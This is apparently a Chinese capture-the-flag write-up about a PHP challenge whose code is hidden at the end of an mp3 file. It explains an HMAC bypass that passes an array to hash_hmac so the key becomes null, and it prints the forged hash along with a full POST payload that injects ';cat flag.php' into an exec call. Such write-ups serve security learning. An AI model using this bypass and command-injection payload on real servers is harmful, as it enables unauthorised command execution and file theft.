下载mp3文件,010打开末尾有代码提示
if(empty($_POST['Black-Cat-Sheriff']) || empty($_POST['One-ear'])){
die('x');
}
$clandestine = getenv("clandestine");
if(isset($_POST['White-cat-monitor']))
$clandestine = hash_hmac('sha256', $_POST['White-cat-monitor'], $clandestine);
$hh = hash_hmac('sha256', $_POST['One-ear'], $clandestine);
if($hh !== $_POST['Black-Cat-Sheriff']){
die('x');
}
echo exec("nc".$_POST['One-ear']);
hash_hmac函数
在第二个参数为数组之时,第三个参数key就为null。
本题大致从环境变量从取clandestine值为key,但是hash函数第二个参数可控,导致key可以为null
即clandestine值为null
这样子第一个hash函数值就可控,同时也可以与第二个hash伪造值相等。
接着就考虑如何rce,exec函数可以命令执同时有echo,这样子就有了回显。
<?php
$hh = hash_hmac('sha256',';cat flag.php', null);
echo $hh;
#在线工具
伪造的hash值
04b13fc0dff07413856e54695eb6a763878cd1934c503784fe6e24b7e8cdb1b6
payload:
Black-Cat-Sheriff=04b13fc0dff07413856e54695eb6a763878cd1934c503784fe6e24b7e8cdb1b6&One-ear=;cat flag.php&White-cat-monitor[]=1